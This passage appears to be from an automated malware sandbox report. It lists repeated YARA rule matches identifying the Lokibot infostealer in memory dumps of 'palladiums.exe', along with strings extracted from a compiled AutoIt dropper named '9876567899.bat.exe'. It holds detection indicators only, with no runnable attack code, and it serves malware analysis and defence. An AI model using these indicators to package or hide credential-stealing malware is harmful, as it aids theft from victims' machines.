                Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: Process Memory Space: palladiums.exe PID: 7092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7220, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7364, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7432, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7500, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7544, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7576, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7600, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7620, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7672, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7696, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7716, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7736, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7760, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7780, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7820, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: palladiums.exe PID: 7856, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9876567899.bat.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 9876567899.bat.exe, 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_26ad66ae-1
                Source: 9876567899.bat.exe, 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_610ff32f-0
                Source: 9876567899.bat.exe, 00000000.00000003.2014356623.0000000003BD1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_baf314ab-8
                Source: 9876567899.bat.exe, 00000000.00000003.2014356623.0000000003BD1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4502bc17-2
                Source: palladiums.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: palladiums.exe, 00000002.00000000.2014682434.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f969af28-2
                Source: palladiums.exe, 00000002.00000000.2014682434.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b7f6e7c3-7
                Source: palladiums.exe, 00000009.00000000.2145805899.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f30205fa-3
                Source: palladiums.exe, 00000009.00000000.2145805899.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_efd5f7cf-d
                Source: palladiums.exe, 0000000B.00000000.2155244137.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c02c83fa-7
                Source: palladiums.exe, 0000000B.00000000.2155244137.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f540bbe9-4
                Source: palladiums.exe, 0000000C.00000002.2178106857.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fd355d4f-0
